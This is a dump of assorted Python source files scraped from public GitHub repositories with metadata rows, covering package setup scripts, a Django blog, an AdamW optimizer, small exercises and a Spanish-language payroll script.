include_dirs=[SRC_DIR + '/cython/',
np.get_include()]),
Extension(SRC_DIR + ".cython.gaussian_kde",
[SRC_DIR + '/cython/gaussian_kde'+ext],
language='c++',
include_dirs=[SRC_DIR + '/cython/',
np.get_include()]),
Extension(SRC_DIR + ".cython.cutils",
[SRC_DIR + "/cython/cutils"+ext],
language='c++',
include_dirs=[SRC_DIR + '/cpp/',
SRC_DIR + '/cython/',
np.get_include()])
]
if USE_CYTHON:
from Cython.Build import cythonize
extensions = cythonize(extensions)
if 'build_ext' in sys.argv:
# just build cython extension module if build_ext subcommand is used
setup(ext_modules = extensions)
else:
import prob2020
version = prob2020.__version__
AUTHOR = 'Collin Tokheim'
EMAIL = 'fake@gmail.com'
URL = 'https://github.com/KarchinLab/probabilistic2020'
DESCRIPTION = 'Probabilistic 20/20'
PACKAGES = [SRC_DIR, SRC_DIR + '.python',
SRC_DIR + '.cython', SRC_DIR + '.cpp',
SRC_DIR + '.console']
setup(name='probabilistic2020',
version=version,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
url=URL,
packages=PACKAGES,
license='JHU Academic Software License Agreement (free for non-commercial use)',
install_requires=['numpy', 'scipy', 'pandas', 'pysam'],
package_data={
SRC_DIR+'.console': ['*.R']
},
entry_points={
'console_scripts':[
'probabilistic2020 = prob2020.console.probabilistic2020:cli_main',
'mut_annotate = prob2020.console.annotate:cli_main',
'extract_gene_seq = prob2020.console.extract_gene_seq:cli_main',
'simulate_non_silent_ratio = prob2020.console.simulate_non_silent_ratio:cli_main'
]
},
long_description=open('README.rst').read(),
classifiers=['Topic :: Scientific/Engineering :: Bio-Informatics',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research'],
ext_modules=extensions
)
| [
"collintokheim@gmail.com"
] | collintokheim@gmail.com |
99dc3ac93eb4286545895911c78ca1aa95a714b8 | b7f8c050ca4ef10b1319afccb276e44cf18a2010 | /setup.py | 1507a4b936694833ed750ec7d982e98b8d7d4447 | [
"Apache-2.0"
] | permissive | dyna-dot/pyglottolog | 22496a2109cc2a775a67e78d8331883a0cfdac33 | 0f24f24a46d1f510c975337e4c0d8c23b357c8bd | refs/heads/master | 2020-08-14T20:59:10.473487 | 2019-09-18T10:15:34 | 2019-09-18T10:15:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,002 | py | from setuptools import setup, find_packages
setup(
name='pyglottolog',
version='2.2.2.dev0',
author='Robert Forkel',
author_email='forkel@shh.mpg.de',
description='python package for glottolog data curation',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
keywords='data linguistics',
license='Apache 2.0',
url='https://github.com/clld/pyglottolog',
packages=find_packages(where='src'),
package_dir={'': 'src'},
platforms='any',
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*',
include_package_data=True,
zip_safe=False,
entry_points={
'console_scripts': ['glottolog=pyglottolog.__main__:main'],
},
install_requires=[
'six>=1.9',
'csvw<=1.5.6; python_version < "3.5"',
'csvw>=1.5.6; python_version >= "3.5"',
'clldutils==2.8.0; python_version < "3.5"',
'clldutils>=2.8.0; python_version >= "3.5"',
'purl',
'pycldf==1.6.4; python_version < "3.5"',
'pycldf>=1.6.4; python_version >= "3.5"',
'sqlalchemy',
'tqdm',
'pybtex>=0.22',
'latexcodec',
'unidecode',
'whoosh',
'attrs>=18.1',
'pycountry>=18.12.8',
'termcolor',
'newick<=0.9.2; python_version < "3.5"',
'newick>=0.9.2; python_version >= "3.5"',
'markdown',
'bs4',
'requests',
'nameparser',
],
extras_require={
'dev': ['tox>=2.9', 'flake8', 'pep8-naming', 'wheel', 'twine'],
'test': ['mock>=2', 'pytest>=3.6', 'pytest-mock', 'pytest-cov'],
},
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| [
"xrotwang@googlemail.com"
] | xrotwang@googlemail.com |
8ad774489dd1562b14923368a5c82d5750bedd7f | 9a2fd5e27d3f811cb18763ed388c2d56ae9907b6 | /模块/模块位置.py | d578991757412884c3b1d2f838aa6ddc40aa2701 | [] | no_license | wzc-ob/PycharmProjects | 5297ce60bade883495e5dbdb614131d31c47682e | 09f5ad6004dbdc83d456cabd78b769fde13d5357 | refs/heads/master | 2020-05-05T07:12:38.789400 | 2019-04-06T10:06:08 | 2019-04-06T10:06:08 | 179,817,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # import sys
# print(sys.path)
# sys.path.append('D:\\PycharmProjects\\模块')#添加Apath为模块查找路径
import sys
sys.path.append('D:\\PycharmProjects\\模块')
import module_test
module_test.m_t_pr()
print('使用module_test模块中的变量:',module_test.name)
| [
"43775612+wzc-ob@users.noreply.github.com"
] | 43775612+wzc-ob@users.noreply.github.com |
19b090d3d81b3707480c416cd85aa5daae56416a | a77fcccb2e46f06842daab98f1057209fe506b18 | /BackJoonOnline/[BOJ]1543_문서검색.py | 1db73e8e2654d5f19a821041568e58ef2a692622 | [] | no_license | gan-ta/Algorithm | 0c55344a6eb8038c9247485a50bc6324e4ef4c3e | 80313278e6e8461891519fd556a65998939bc564 | refs/heads/master | 2023-05-27T17:03:28.236320 | 2021-06-14T18:48:35 | 2021-06-14T18:48:35 | 257,796,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | def calc_dp(n):
max_value = 0
for i in range(0, n - len(sub_str) + 1):
if max_value < dp[i]:
max_value = dp[i]
if full_str[n:].startswith(sub_str):
dp[n] = max_value + 1
else:
dp[n] = max_value
if __name__ == '__main__':
full_str = input()
sub_str = input()
dp = [0] * len(full_str)
for i in range(0, len(full_str)):
calc_dp(i)
print(max(dp))
| [
"gilmat@naver.com"
] | gilmat@naver.com |
f1874cffe8589d7d7cb20dd323029128249aa73e | 71c247dc9bc9fe8c16daec09f337010043ca2943 | /questions/migrations/0002_petmodel.py | 7b116ee386fe280497d4e5214568220213cb4710 | [] | no_license | elcolie/muy | c001c64499c7ecf4a18fd4da5c7263f880a4be2f | 7e8fcc83c9d875806f18c2a57f1d8b6351e6be04 | refs/heads/master | 2020-07-06T03:10:09.449152 | 2019-12-06T12:24:04 | 2019-12-06T12:24:04 | 125,982,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | # Generated by Django 2.2.4 on 2019-10-16 07:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('questions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PetModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kind', models.CharField(choices=[('cat', 'Cat'), ('dog', 'Dog')], max_length=100)),
],
),
]
| [
"sarit@elcolie.com"
] | sarit@elcolie.com |
6a25852b6293b3676b6b0198c0d93d674c6fc44f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02848/s039122387.py | f66ce6cbc8f4c644979fe91d95726caeea7782fa | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | n=int(input())
s=input()
ans=""
for i in s:
ans+=chr(ord("A")+(ord(i)-ord("A")+n)%26)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
56acdc0c52bd147e4d98d3216d0555fd47d3e5c9 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_084/ch150_2020_04_13_19_48_43_698298.py | dfe80f0c803c05abcffb09810115898aee8b8f15 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | import math
def calcula_pi (n):
i=1
p=0
while i<=n:
p+=6/(i**2)
pi=math.sqrt(p)
return pi | [
"you@example.com"
] | you@example.com |
18839609dbc881470c5684a1cfaa7e08aa130f9f | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/ads/googleads/v5/googleads-py/google/ads/googleads/v5/common/types/text_label.py | 0c14a9e62aed19713a0e6374abd7c8229def98dd | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,724 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import wrappers_pb2 as wrappers # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v5.common',
marshal='google.ads.googleads.v5',
manifest={
'TextLabel',
},
)
class TextLabel(proto.Message):
r"""A type of label displaying text on a colored background.
Attributes:
background_color (google.protobuf.wrappers_pb2.StringValue):
Background color of the label in RGB format. This string
must match the regular expression
'^#([a-fA-F0-9]{6}|[a-fA-F0-9]{3})$'. Note: The background
color may not be visible for manager accounts.
description (google.protobuf.wrappers_pb2.StringValue):
A short description of the label. The length
must be no more than 200 characters.
"""
background_color = proto.Field(proto.MESSAGE, number=1,
message=wrappers.StringValue,
)
description = proto.Field(proto.MESSAGE, number=2,
message=wrappers.StringValue,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
bd39e9509d27e59130f875225feec6bf5ec17ecc | d190750d6cb34e9d86ae96724cf4b56a2f57a74a | /tests/r/test_thurstone.py | e349ecc070dc0a55dfa91d013b7380c34c3f5900 | [
"Apache-2.0"
] | permissive | ROAD2018/observations | a119f61a48213d791de0620804adb8d21c2ad9fb | 2c8b1ac31025938cb17762e540f2f592e302d5de | refs/heads/master | 2021-09-24T04:28:02.725245 | 2018-09-16T23:06:30 | 2018-09-16T23:06:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.thurstone import thurstone
def test_thurstone():
"""Test module thurstone.py by downloading
thurstone.csv and testing shape of
extracted data has 9 rows and 9 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = thurstone(test_path)
try:
assert x_train.shape == (9, 9)
except:
shutil.rmtree(test_path)
raise()
| [
"dustinviettran@gmail.com"
] | dustinviettran@gmail.com |
998772f84df860c76d5e093fc8d05cddc95a48cc | 5a4c55ad757410611a65999ab7304f701a74f657 | /cratonclient/tests/__init__.py | 011af390055f25bb0a11fa1d01bb6b1c4a1d239c | [
"Apache-2.0"
] | permissive | opstooling/python-cratonclient | 28426596be6dbd76696edb26235ee0d2bbf9ec67 | c123f0e35dbc0e99186f2c8ec65864d7834e0edb | refs/heads/master | 2021-01-20T20:35:55.003738 | 2016-07-06T16:18:58 | 2016-07-06T16:18:58 | 61,128,908 | 0 | 1 | null | 2016-07-13T17:26:03 | 2016-06-14T14:19:38 | Python | UTF-8 | Python | false | false | 591 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test suite for Craton client and shell."""
| [
"graffatcolmingov@gmail.com"
] | graffatcolmingov@gmail.com |
f4014bf9c030093fdd9e44efc7935f2677b3b1ca | 1796043fc26c958b8fc45d9c058e382473c4f3af | /Fabio02_A/f2_a_q22_duracao_jogo.py | dbb6ae9b4c8f2bf3916f579e31f17f48cda61bfd | [] | no_license | Lucakurotaki/ifpi-ads-algoritmos2020 | a69adec27dbb10aceab1bc7038a0b56a760f99d1 | 34d5fedd5825a85404cf9340e42be618981679c1 | refs/heads/master | 2022-03-22T04:44:14.211359 | 2022-02-19T18:48:36 | 2022-02-19T18:48:36 | 246,585,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | def main():
h_inicio = int(input("Digite a hora do início do jogo: "))
m_inicio = int(input("Digite o minuto do início do jogo: "))
h_fim = int(input("Digite a hora do fim do jogo: "))
m_fim = int(input("Digite o minuto do fim do jogo: "))
print(duracao(h_inicio,m_inicio,h_fim,m_fim))
def duracao(hi,mi,hf,mf):
if hf >= hi and mf >= mi:
dur_h = hf - hi
dur_min = mf - mi
elif hf <= hi and mf < mi:
dur_h = 23+hf - hi
dur_min = 60+mf - mi
elif hf < hi and mf >= mi:
dur_h = 24+hf - hi
dur_min = mf - mi
elif hf > hi and mf < mi:
dur_h = hf - hi
dur_min = 60+mf - mi
return "A duração do jogo é de {} horas e {} minutos.".format(dur_h,dur_min)
main()
| [
"noreply@github.com"
] | Lucakurotaki.noreply@github.com |
20ddfbe36286b792f45620f1976827510cbe3b1c | 74549d7c57b4746ac2a9c275aa12bfc577b0e8af | /prob9.py | a921e7c7ee4566f8d4b41372890da77be1ee213e | [] | no_license | abidkhan484/hackerrank_solution | af9dbf6ec1ead920dc18df233f40db0c867720b4 | b0a98e4bdfa71a4671999f16ab313cc5c76a1b7a | refs/heads/master | 2022-05-02T11:13:29.447127 | 2022-04-13T03:02:59 | 2022-04-13T03:02:59 | 99,207,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | def facto(x):
if(x<=0):
return 1
else:
result=1
result = x * facto(x-1)
return result
user_input = int(input().strip())
print(facto(user_input))
| [
"abidkhan484@gmail.com"
] | abidkhan484@gmail.com |
1c4a50aa0a877c28978f7261fdd1fcd169ddfdb8 | b913242e405a7e8860501df6fd8c41513a32e820 | /custom_test.py | 599db660a03cf659a909a8601364125523ca3403 | [
"MIT"
] | permissive | qiuwei/nicegui | 55d34507e3a5dc4e1e0565c5559f81610e5df4ca | aa0c781a80b8e05d8ada0a4cddd670a7ae13fcda | refs/heads/main | 2023-09-04T18:29:48.801099 | 2021-11-25T13:26:36 | 2021-11-25T13:26:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | #!/usr/bin/env python3
from nicegui import ui
with ui.card():
example = ui.custom_example(on_change=lambda number: label.set_text(f'Custom value: {number}'))
ui.button('Add 100', on_click=lambda: example.add(100))
label = ui.label()
ui.joystick(on_move=lambda e: print("move", e.data.vector), color='blue', size=50)
| [
"falko@zauberzeug.com"
] | falko@zauberzeug.com |
6bf9e79c5fe871e199d6a500d86789841ddc85db | 1d717c797e93b451f7da7c810a0fb4075b1050d5 | /src/optimizer/adamw.py | 11c4536636c11dfc4bdcbd94a8f3a606d9e9e307 | [] | no_license | jessie0624/nlp-task | 32338b08051a3ea192db2bf74c9c969bdff1f6ad | aaeeed86341356d9fd061664f6f7bccf2ac353d0 | refs/heads/master | 2023-01-24T12:06:13.323646 | 2020-12-10T08:38:23 | 2020-12-10T08:38:23 | 292,151,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,386 | py | #!/usr/bin/env python
# encoding: utf-8
'''
@author: zessay
@license: (C) Copyright Sogou.
@contact: zessay@sogou-inc.com
@file: adamw.py
@time: 2019/12/4 17:49
@description: AdamW优化器函数
'''
import torch
import math
from torch.optim.optimizer import Optimizer
class AdamW(Optimizer):
""" Implements Adam algorithm with weight decay fix.
Parameters:
lr (float): learning rate. Default 1e-3.
betas (tuple of 2 floats): Adams beta parameters (b1, b2). Default: (0.9, 0.999)
eps (float): Adams epsilon. Default: 1e-6
weight_decay (float): Weight decay. Default: 0.0
correct_bias (bool): can be set to False to avoid correcting bias in Adam (e.g. like in Bert TF repository). Default True.
Example:
>>> model = LSTM()
>>> optimizer = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-6, weight_decay=0.0, correct_bias=True):
if lr < 0.0:
raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter: {} - should be in [0.0, 1.0[".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter: {} - should be in [0.0, 1.0[".format(betas[1]))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(eps))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
correct_bias=correct_bias)
super(AdamW, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
exp_avg.mul_(beta1).add_(1.0 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1.0 - beta2, grad, grad)
denom = exp_avg_sq.sqrt().add_(group['eps'])
step_size = group['lr']
if group['correct_bias']: # No bias correction for Bert
bias_correction1 = 1.0 - beta1 ** state['step']
bias_correction2 = 1.0 - beta2 ** state['step']
step_size = step_size * math.sqrt(bias_correction2) / bias_correction1
p.data.addcdiv_(-step_size, exp_avg, denom)
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
# Add weight decay at the end (fixed version)
if group['weight_decay'] > 0.0:
p.data.add_(-group['lr'] * group['weight_decay'], p.data)
return loss | [
"jessie_lijie@126.com"
] | jessie_lijie@126.com |
4515b2a2c837a6c1b1154219c1123b96f284b6fc | 0216ac17591c6b3d68cb454371ecd3a5564c7af4 | /project_2/coupled-cluster/tests/test_matrix_elements.py | 2851e2bb3321dbe085273adae5bdd776e8250ba0 | [] | no_license | Schoyen/FYS4411 | 3746a155b4026dbf04009cb4e8960a23201351fe | abb580c3c8bb41a71657f559c27bc6e21e04bf17 | refs/heads/master | 2021-05-11T06:34:02.909787 | 2019-06-27T12:49:00 | 2019-06-27T12:49:00 | 117,991,933 | 1 | 0 | null | 2018-03-06T20:22:03 | 2018-01-18T14:16:08 | Jupyter Notebook | UTF-8 | Python | false | false | 1,300 | py | import pytest
import sparse
from coupled_cluster.matrix_elements.index_map import (
get_indices_nm, generate_index_map
)
from coupled_cluster.matrix_elements.generate_matrices import (
get_coulomb_elements, get_antisymmetrized_elements,
get_one_body_elements_spin
)
def test_two_body_generation():
orbital_integrals = pytest.orbital_integrals
l = pytest.l
num_shells = pytest.num_shells
generate_index_map(num_shells)
sparse.utils.assert_eq(
orbital_integrals, get_coulomb_elements(l), atol=1e-5, rtol=1e-5)
def test_two_body_antisymmetric_generation():
u = pytest.u
l = pytest.l
num_shells = pytest.num_shells
generate_index_map(num_shells)
sparse.utils.assert_eq(
u, get_antisymmetrized_elements(l), atol=1e-5, rtol=1e-5)
def test_one_body_generation():
h = pytest.h
l = pytest.l
num_shells = pytest.num_shells
generate_index_map(num_shells)
sparse.utils.assert_eq(
h, get_one_body_elements_spin(l), atol=1e-5, rtol=1e-5)
def test_large_file():
l = pytest.large_l
orbital_integrals = pytest.large_oi
num_shells = pytest.large_num_shells
generate_index_map(num_shells)
u = get_coulomb_elements(l)
sparse.utils.assert_eq(orbital_integrals, u)
| [
"oyvindschoyen@gmail.com"
] | oyvindschoyen@gmail.com |
35cef8b4c3957b43e069b2a8df2b8e7caefbb133 | e747bac825ed5807f72654030e108b8c8f96b902 | /mysite/.history/blog/views_20200716005453.py | df0879463678c569afeeac8f8bd0ce8858bd4344 | [] | no_license | AyatSoft/Tech_blog | 4415ab7dfb04bc53bddaf16fd4772e8554680ae8 | 4728c44e0685c3b97038db5e0232e12f35446e23 | refs/heads/master | 2022-11-15T23:01:52.310968 | 2020-07-16T08:52:51 | 2020-07-16T08:52:51 | 280,103,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,194 | py | from .models import Post
from django.shortcuts import render, HttpResponsePermanentRedirect
from django.contrib.auth.mixins import LoginRequiredMixin
from .forms import PostForm, CommentForm, MyRegistrationForm
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy, reverse
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.decorators import login_required
# to do
# setting up the sign in page
# sign up page
# redirect to the necessary
# setting up form for sign in and sign up page
# make asign up model
# this will be function based view
def sign_up(request):
# import the Registration form
form = MyRegistrationForm()
registered = False
if request.method == "POST":
# fill the form
form = MyRegistrationForm(data=request.POST)
# validate
if form.is_valid():
form.save()
registered = True
# when the page
fdict = {'form': form, 'registered': registered}
return render(request, 'registration/register.html', fdict)
def login_user(request):
form = AuthenticationForm()
loggedin = False
if request.method == "POST":
form = AuthenticationForm(data=request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
print(user)
if user is not None:
login(request, user)
loggedin = True
return HttpResponsePermanentRedirect(reverse('blog:post_list'))
return render(request, 'registration/login.html', {'form': form})
@login_required
def logout_user(request):
logout(request)
return HttpResponsePermanentRedirect(reverse('blog:post_list'))
class AboutView(TemplateView):
template_name = "blog/about.html"
class PostListView(ListView):
model = Post
# customize the query
def get_queryset(self):
return Post.objects.order_by('-published_date')
class PostDetailView(DetailView):
model = Post
# in the create View we also use the mixin
# it is the same as the @login_required in the function
# based views
# and the class based view for Create View
class CreatePostView(LoginRequiredMixin, CreateView):
# login mixin wants wo know
# where they will prompt you for login
# so provide a url
login_url = '/login/'
# after login where they will redirect
# this variable name cant be changed
redirect_field_name = 'blog/post_detail.html'
# for creating you need a form
form_class = PostForm
template_name = "blog/post_form.html"
# WHY ADDING THIS ?
# IN THE MODELS WE HAVE THREE FIELD THAT CANT BE NULL AND HAVE TO
# BE ADDED .ONE IS THE USER OBJECT BUT WE DONT GIVE USER TO SET THE AUTHOR FIELD
# THE CURRENT USER WILL BE THE VALUE
# SO THIS METHOD WE OVERRITE AND SET THE LOGGED USER TO THE CURRENT AUTHOR
# OTHER WISE THESE FILED WILL BE EMPTY
# SO WE SET THE VALUE AND THE TITLE AND TEXT WILL BE FILLED WITH USER
def form_valid(self, form):
form.instance.author_id = self.request.user.pk
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UpdateView):
login_url = '/login/'
redirect_field_name = 'blog/post_detail.html'
form_class = PostForm
template_name = "blog/post_form.html"
model = Post
# same thing we will do but this time
# for all the unpublished
# so we change the queryset
class DraftListView(LoginRequiredMixin, ListView):
login_url = '/login/'
redirect_field_name = 'blog/post_list.html'
model = Post
def get_queryset(self):
return Post.objects.filter(published_date__isnull=True).order_by('created_date')
class PostDeleteView(LoginRequiredMixin, DeleteView):
model = Post
# reverse lazy will be done only after the post is
# deleted successfully
# it will wait untill it is done
success_url = reverse_lazy('blog:post_list')
| [
"tanviredu2018@gmail.com"
] | tanviredu2018@gmail.com |
b9ff9e359c42c6f56fe741cd5dca07ef4ea2980f | 7b12eb45c1ea76ad9c186b858b5dfebf2c5b862a | /.history/DEBER_20210904233156.py | f759b7aca2a0174716d1d345f4abf0c57a897202 | [
"MIT"
] | permissive | Alopezm5/PROYECTO-PARTE-1 | a1dce04009b24852c1c60e69bdf602ad3af0574b | bd7a8594edf08d41c6ca544cf6bac01ea4fcb684 | refs/heads/main | 2023-07-25T11:22:17.994770 | 2021-09-07T03:27:34 | 2021-09-07T03:27:34 | 403,670,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | import os
class Empresa():
def __init__(self,nom="",ruc=0,dire="",tele=0,ciud="",tipEmpr=""):
self.nombre=nom
self.ruc=ruc
self.direccion=dire
self.telefono=tele
self.ciudad=ciud
self.tipoEmpresa=tipEmpr
def datosEmpresa(self):#3
self.nombre=input("Ingresar nombre de la empresa: ")
self.ruc=int(input("Ingresar ruc de la empresa: "))
self.direccion=input("Ingresar la direccion de la empresa: ")
self.telefono=int(input("Ingresar el numero de telefono de la empresa: "))
self.ciudad=input("Ingresar ciudad donde esta la empresa: ")
self.tipoEmpresa=input("Ingresar tipo de empresa publica o privada: ")
def mostrarEmpresa(self):
print("")
print("Datos de la Empresa")
print("La empresa de nombre {}\n De RUC #{} \n Está ubicada en {}\n Se puede comunicar al #{}\n Está empresa esta en la ciudad de {}\n Es una entidad {}".format(self.nombre,self.ruc,self.direccion, self.telefono,self.ciudad, self.tipoEmpresa))
class Empleado(Empresa):
def __init__(self,nom="",cedu=0,dire="",tele=0,email="",estado="",profe="",iess=0):
self.nombre=nom
self.cedula=cedu
self.direccion=dire
self.telefono=tele
self.correo=email
self.estadocivil=estado
self.profesion=profe
self.iess=iess
def empleado(self):
self.nombre=input("Ingresar nombre del empleado: ")
self.cedula=int(input("Ingresar numero de cedula del empleado: "))
self.direccion=input("Ingresar la direccion del empleado: ")
self.telefono=int(input("Ingresar numero de contacto del empleado: "))
self.correo=input("Ingresar correo personal del empleado: ")
self.iess=float(input("Ingresar valor del iees recordar que debe ser porcentuado Ejemplo si quiere decir 20% debe ingresar 0.20"))
def empleadoObrero(self):
self.estadocivil=input("Ingresar estado civil del empleado: ")
def empleadoOficina(self):
self.profesion=input("Ingresar profesion del empleado: ")
# def mostrarempleado(self):
# print("El empleado: {} con # de C.I. {} \n Con direccion {}, y numero de contacto{}\n Y correo {}".format(self.nombre,self.cedula,self.direccion,self.telefono,self.correo))
class Departamento(Empleado):
def __init__(self,dep=""):
self.departamento=dep
def departa(self):
self.departamento=input("Ingresar el departamento al que pertenece el empleado: ")
def mostrarDeparta(self):
print("El empleado pertenece al departamento de: {}".format(self.departamento))
class Pagos(Empleado):
def __init__(self, desper=0,valhora=0,hotraba=0,extra=0,suel=0,hrecar=0,hextra=0,pres=0,mcou=0,valho=0,sobtiem=0,comofi=0,antobre=0,iemple=0,cuopres=0,tot=0,liquid=0,cuota=0,anti=0,comi=0,fNomina="",fIngreso=""):
self.permisos=desper
self.valorhora=valhora
self.horastrabajadas=hotraba
self.valextra=extra
self.sueldo= suel
self.horasRecargo= hrecar
self.horasExtraordinarias=hextra
self.prestamo= pres
self.mesCuota= mcou
self.valor_hora= valho
self.sobretiempo=sobtiem
self.comEmpOficina = comofi
self.antiEmpObrero = antobre
self.iessEmpleado = iemple
self.cuotaPrestamo=cuopres
self.totdes = tot
self.liquidoRecibir = liquid
self.mesCuota=cuota
self.antiguedad=anti
self.comision=comi
self.fechaNomina=fNomina
self.fechaIngreso=fIngreso
def pagoNormal(self):
self.sueldo=float(input("Ingresar sueldo del trabajador: $ "))
self.prestamo=float(input("Ingresar monto del prestamo que ha generado el empleado: $ "))
self.mesCuota=int(input("Ingresar meses a diferir el prestamo: "))
self.comision=float(input("Ingresar valor de la comsion: "))
self.antiguedad=int(input("Ingresar antiguedad: "))
def pagoExtra(self):
self.horasRecargo=int(input("Ingresar horas de recargo: "))
self.horasExtraordinarias=int(input("Ingresar horas extraordinarias: "))
self.fechaNomina=input("Ingresar fecha de nomida (formato año-mes-dia): ")
self.fechaIngreso=input("Ingresar fecha de ingreso (formato año-mes-dia): ")
def calculoSueldo(self):
self.valor_hora=self.sueldo/240
self.sobretiempo= self.valor_hora * (self.horasRecargo*0.50+self.horasExtraordinarias*2)
self.comEmpOficina = self.comision*self.sueldo
self.antiEmpObrero = self.antiguedad*(self.fechaNomina - self.fechaIngreso)/365*self.sueldo
self.iessEmpleado = self.iess*(self.sueldo+self.sobretiempo)
self.cuotaPrestamo=self.prestamo/self.mesCuota
if eleccion==1:
self.toting = self.sueldo+self.sobretiempo+ self.comEmpOficina
elif eleccion==2:
self.toting = self.sueldo+self.sobretiempo+self.antiEmpObrero
self.totdes = self.iessEmpleado + self.prestamoEmpleado
self.liquidoRecibir = self.toting - self.totdes
def mostrarSueldo(self):
print(self.liquidoRecibir)
emp=Empresa()
emp.datosEmpresa()
os.system ("cls")
emple=Empleado()
emple.empleado()
os.system ("cls")
eleccion=int(input("Va a ingresar un empleado tipo 1. Obreo o 2.Oficina: "))
emple.empleadoObrero()
emple.empleadoOficina()
os.system ("cls")
